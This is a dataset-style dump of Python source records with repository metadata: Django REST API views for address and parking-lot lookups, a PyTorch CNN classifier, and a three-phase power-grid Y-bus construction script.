st.image (Imagen_despedida,use_column_width=True) | 0 | 0 | 0 |
f0e198f4326950fbb0c36cb549ee304c117f89ff | 2,917 | py | Python | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | 1 | 2018-08-02T04:00:44.000Z | 2018-08-02T04:00:44.000Z | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | null | null | null | address/views_api.py | YangWanjun/areaparking | b08bc9b8f8d5f602d823115263b9d040edb9f245 | [
"Apache-2.0"
] | null | null | null | from rest_framework import viewsets
from rest_framework.filters import SearchFilter
from rest_framework.response import Response
from . import biz, models, serializers
from parkinglot.models import ParkingLot
from utils.django_base import BaseApiPagination
| 33.918605 | 103 | 0.696606 | from rest_framework import viewsets
from rest_framework.filters import SearchFilter
from rest_framework.response import Response
from . import biz, models, serializers
from parkinglot.models import ParkingLot
from utils.django_base import BaseApiPagination
class PrefViewSet(viewsets.ModelViewSet):
queryset = models.Pref.objects.public_all()
serializer_class = serializers.PrefSerializer
filter_fields = ('code', 'name')
class CityViewSet(viewsets.ModelViewSet):
queryset = models.City.objects.public_all()
serializer_class = serializers.CitySerializer
filter_fields = ('code', 'name')
pagination_class = BaseApiPagination
class AzaViewSet(viewsets.ModelViewSet):
queryset = models.Aza.objects.public_all()
serializer_class = serializers.AzaSerializer
filter_fields = ('code', 'name', 'city__code')
pagination_class = BaseApiPagination
class PostcodeViewSet(viewsets.ModelViewSet):
queryset = models.Postcode.objects.public_all()
serializer_class = serializers.PostcodeSerializer
filter_fields = ('post_code',)
pagination_class = BaseApiPagination
class GeocodeViewSet(viewsets.ViewSet):
def list(self, request, format=None):
address = request.GET.get('address', None)
coordinate = biz.geocode(address)
return Response(coordinate)
class TargetAreaViewSet(viewsets.ViewSet):
def list(self, request, format=None):
search = request.GET.get('search', None)
area_list = []
if search:
city_qs = models.City.objects.public_filter(name__startswith=search).values('code', 'name')
for city in city_qs:
area_list.append({'id': city.get('code'), 'label': city.get('name')})
aza_qs = models.Aza.objects.public_filter(name__startswith=search).values('code', 'name')
for aza in aza_qs:
area_list.append({'id': aza.get('code'), 'label': aza.get('name')})
lot_qs = ParkingLot.objects.public_filter(name__icontains=search).values('code', 'name')
for lot in lot_qs:
area_list.append({'id': lot.get('code'), 'label': lot.get('name')})
return Response(area_list)
class TargetCityViewSet(viewsets.ModelViewSet):
queryset = models.City.objects.public_all()
serializer_class = serializers.TargetCitySerializer
filter_backends = [SearchFilter]
search_fields = ('name',)
class TargetAzaViewSet(viewsets.ModelViewSet):
queryset = models.Aza.objects.public_all()
serializer_class = serializers.TargetAzaSerializer
filter_backends = [SearchFilter]
search_fields = ('name',)
class FuriganaViewSet(viewsets.ViewSet):
def list(self, request, format=None):
search = request.GET.get('search', None)
if search:
r = biz.get_furigana(search)
return Response(r)
else:
return Response(dict())
| 1,149 | 1,213 | 288 |
4626e516ccf59e42c9386b9d54dfa4f38e9c3b45 | 2,491 | py | Python | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | best_weights/trial2/CNN.py | misoyuri/ML_Project | b82d3573d8a365a2a8b034edf92d7aeda5abfd0f | [
"BSD-2-Clause"
] | null | null | null | class HelloCNN(nn.Module):
"""
Simple CNN Clssifier
"""
| 27.677778 | 46 | 0.415094 | class HelloCNN(nn.Module):
"""
Simple CNN Clssifier
"""
def __init__(self, num_classes=7):
super(HelloCNN, self).__init__()
self.conv1 = nn.Sequential(
nn.Conv2d(1, 48, 3, padding=1),
nn.ReLU(),
nn.Conv2d(48, 48, 3, padding=1),
nn.ReLU(),
nn.BatchNorm2d(48),
nn.MaxPool2d(2, 2),
nn.Dropout(0.2)
)
self.conv2 = nn.Sequential(
nn.Conv2d(48, 96, 3, padding=1),
nn.ReLU(),
nn.Conv2d(96, 96, 3, padding=1),
nn.ReLU(),
nn.Conv2d(96, 96, 3, padding=1),
nn.ReLU(),
nn.BatchNorm2d(96),
nn.MaxPool2d(2, 2),
nn.Dropout(0.2)
)
self.conv3 = nn.Sequential(
nn.Conv2d(96, 192, 3, padding=1),
nn.ReLU(),
nn.Conv2d(192, 192, 3, padding=1),
nn.ReLU(),
nn.Conv2d(192, 192, 3, padding=1),
nn.ReLU(),
nn.Conv2d(192, 192, 3, padding=1),
nn.ReLU(),
nn.BatchNorm2d(192),
nn.MaxPool2d(2, 2),
nn.Dropout(0.2)
)
self.conv4 = nn.Sequential(
nn.Conv2d(192, 384, 3, padding=1),
nn.ReLU(),
nn.Conv2d(384, 384, 3, padding=1),
nn.ReLU(),
nn.Conv2d(384, 384, 3, padding=1),
nn.ReLU(),
nn.Conv2d(384, 384, 3, padding=1),
nn.ReLU(),
nn.BatchNorm2d(384),
nn.MaxPool2d(2, 2),
nn.Dropout(0.2)
)
self.conv5 = nn.Sequential(
nn.Conv2d(384, 500, 3, padding=1),
nn.ReLU(),
nn.Conv2d(500, 500, 3, padding=1),
nn.ReLU(),
nn.Conv2d(500, 500, 3, padding=1),
nn.ReLU(),
nn.Conv2d(500, 500, 3, padding=1),
nn.ReLU(),
nn.BatchNorm2d(500),
nn.AvgPool2d(3),
nn.Dropout(0.2)
)
self.fc = nn.Sequential(
nn.Linear(500, 250),
nn.Linear(250, 7),
)
def forward(self, x):
x = self.conv1(x)
x = self.conv2(x)
x = self.conv3(x)
x = self.conv4(x)
x = self.conv5(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
x = F.log_softmax(x, dim=1)
return x | 2,342 | 0 | 61 |
b4d5f8b9de9168b54916b7b72cb30ed041002a0c | 3,382 | py | Python | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 284 | 2016-01-31T03:20:44.000Z | 2022-03-17T21:16:52.000Z | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 94 | 2016-01-14T13:37:40.000Z | 2022-03-28T03:13:56.000Z | src/research/three_phase/tests/vectorized_y_bus.py | mzy2240/GridCal | 0352f0e9ce09a9c037722bf2f2afc0a31ccd2880 | [
"BSD-3-Clause"
] | 84 | 2016-03-29T10:43:04.000Z | 2022-02-22T16:26:55.000Z |
from research.three_phase.Engine import *
from scipy.sparse import lil_matrix
np.set_printoptions(linewidth=100000)
def set_sub(A, cols, rows, sub_mat):
"""
Set sub-matrix in place into sparse matrix
:param A: Sparse matrix
:param cols: array of columns (size m)
:param rows: array of rows (size n)
:param sub_mat: dense array (size n x m)
"""
for i, a in enumerate(rows):
for j, b in enumerate(cols):
A[a, b] = sub_mat[i, j]
def y_bus(circuit: Circuit):
"""
Vectorized 3-phase Y bus building
:param circuit: Circuit instance
:return:
"""
n = len(circuit.buses)
m = len(circuit.branches)
Cf = lil_matrix((3 * m, 3 * n))
Ct = lil_matrix((3 * m, 3 * n))
yff = lil_matrix((3 * m, 3 * m), dtype=complex)
yft = lil_matrix((3 * m, 3 * m), dtype=complex)
ytf = lil_matrix((3 * m, 3 * m), dtype=complex)
ytt = lil_matrix((3 * m, 3 * m), dtype=complex)
bus_idx = dict()
# compile nodes
for k, elm in enumerate(circuit.buses):
# store the object and its index in a dictionary
bus_idx[elm] = k
br_ind = np.array([0, 1, 2])
for k, branch in enumerate(circuit.branches):
# get the single-phase bus indices
f_idx = bus_idx[branch.f]
t_idx = bus_idx[branch.t]
# expand the bus indices to the n-phase scheme
f3 = 3 * f_idx + branch.phases_from
t3 = 3 * t_idx + branch.phases_to
# expand the branch index to the n-phase scheme
b3 = 3 * k + br_ind
# set the connectivity matrices (note that we set the values at (b3[0], f3[0]), (b3[1], f3[1]), (b3[2], f3[2])
Cf[b3, f3] = np.ones(3, dtype=int)
Ct[b3, t3] = np.ones(3, dtype=int)
# get the four 3x3 primitives of the branch
A, B, C, D, _, _ = branch.get_ABCD(Sbase=circuit.Sbase)
# set the sub-matrices
set_sub(A=yff, cols=b3, rows=b3, sub_mat=A)
set_sub(A=yft, cols=b3, rows=b3, sub_mat=B)
set_sub(A=ytf, cols=b3, rows=b3, sub_mat=C)
set_sub(A=ytt, cols=b3, rows=b3, sub_mat=D)
# compose Yf, Yt and Ybus
yf = yff * Cf + yft * Ct
yt = ytf * Cf + ytt * Ct
ybus = Cf.transpose() * yf + Ct.transpose() * yt
print(ybus.todense())
if __name__ == "__main__":
P = np.array([2.5, 2.5, 2.5])
S = np.array([2+2j, 20+2j, 40+3j])
b1 = Bus("B1", number_of_phases=3, Vnom=10.0)
b1.is_slack = True
b1.add_generator(Generator("", P=P, v=1.0))
b2 = Bus("B2", number_of_phases=3, Vnom=10.0)
b2.add_load(LoadSIY("", S, np.zeros_like(S), np.zeros_like(S)))
b3 = Bus("B3", number_of_phases=3, Vnom=10.0)
# b3.add_generator(Generator("", P=P*0.5, v=1.0))
line_type1 = LineTypeSeq(name="",
Z_SEQ=np.array([0.4606 + 1.7536j, 0.1808 + 0.6054j, 0.1808 + 0.6054j])/100,
Ysh_SEQ=np.array([0, 0, 0]))
lne1 = Line("L1", line_type1, bus_from=b1, bus_to=b2, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=100.0)
lne2 = Line("L2", line_type1, bus_from=b2, bus_to=b3, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=10.0)
circuit_ = Circuit(Sbase=100)
circuit_.buses.append(b1)
circuit_.buses.append(b2)
circuit_.buses.append(b3)
circuit_.branches.append(lne1)
circuit_.branches.append(lne2)
y_bus(circuit=circuit_)
| 29.929204 | 118 | 0.587522 |
from research.three_phase.Engine import *
from scipy.sparse import lil_matrix
np.set_printoptions(linewidth=100000)
def set_sub(A, cols, rows, sub_mat):
"""
Set sub-matrix in place into sparse matrix
:param A: Sparse matrix
:param cols: array of columns (size m)
:param rows: array of rows (size n)
:param sub_mat: dense array (size n x m)
"""
for i, a in enumerate(rows):
for j, b in enumerate(cols):
A[a, b] = sub_mat[i, j]
def y_bus(circuit: Circuit):
"""
Vectorized 3-phase Y bus building
:param circuit: Circuit instance
:return:
"""
n = len(circuit.buses)
m = len(circuit.branches)
Cf = lil_matrix((3 * m, 3 * n))
Ct = lil_matrix((3 * m, 3 * n))
yff = lil_matrix((3 * m, 3 * m), dtype=complex)
yft = lil_matrix((3 * m, 3 * m), dtype=complex)
ytf = lil_matrix((3 * m, 3 * m), dtype=complex)
ytt = lil_matrix((3 * m, 3 * m), dtype=complex)
bus_idx = dict()
# compile nodes
for k, elm in enumerate(circuit.buses):
# store the object and its index in a dictionary
bus_idx[elm] = k
br_ind = np.array([0, 1, 2])
for k, branch in enumerate(circuit.branches):
# get the single-phase bus indices
f_idx = bus_idx[branch.f]
t_idx = bus_idx[branch.t]
# expand the bus indices to the n-phase scheme
f3 = 3 * f_idx + branch.phases_from
t3 = 3 * t_idx + branch.phases_to
# expand the branch index to the n-phase scheme
b3 = 3 * k + br_ind
# set the connectivity matrices (note that we set the values at (b3[0], f3[0]), (b3[1], f3[1]), (b3[2], f3[2])
Cf[b3, f3] = np.ones(3, dtype=int)
Ct[b3, t3] = np.ones(3, dtype=int)
# get the four 3x3 primitives of the branch
A, B, C, D, _, _ = branch.get_ABCD(Sbase=circuit.Sbase)
# set the sub-matrices
set_sub(A=yff, cols=b3, rows=b3, sub_mat=A)
set_sub(A=yft, cols=b3, rows=b3, sub_mat=B)
set_sub(A=ytf, cols=b3, rows=b3, sub_mat=C)
set_sub(A=ytt, cols=b3, rows=b3, sub_mat=D)
# compose Yf, Yt and Ybus
yf = yff * Cf + yft * Ct
yt = ytf * Cf + ytt * Ct
ybus = Cf.transpose() * yf + Ct.transpose() * yt
print(ybus.todense())
if __name__ == "__main__":
P = np.array([2.5, 2.5, 2.5])
S = np.array([2+2j, 20+2j, 40+3j])
b1 = Bus("B1", number_of_phases=3, Vnom=10.0)
b1.is_slack = True
b1.add_generator(Generator("", P=P, v=1.0))
b2 = Bus("B2", number_of_phases=3, Vnom=10.0)
b2.add_load(LoadSIY("", S, np.zeros_like(S), np.zeros_like(S)))
b3 = Bus("B3", number_of_phases=3, Vnom=10.0)
# b3.add_generator(Generator("", P=P*0.5, v=1.0))
line_type1 = LineTypeSeq(name="",
Z_SEQ=np.array([0.4606 + 1.7536j, 0.1808 + 0.6054j, 0.1808 + 0.6054j])/100,
Ysh_SEQ=np.array([0, 0, 0]))
lne1 = Line("L1", line_type1, bus_from=b1, bus_to=b2, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=100.0)
lne2 = Line("L2", line_type1, bus_from=b2, bus_to=b3, conn_from=[0, 1, 2], conn_to=[0, 1, 2], length=10.0)
circuit_ = Circuit(Sbase=100)
circuit_.buses.append(b1)
circuit_.buses.append(b2)
circuit_.buses.append(b3)
circuit_.branches.append(lne1)
circuit_.branches.append(lne2)
y_bus(circuit=circuit_)
| 0 | 0 | 0 |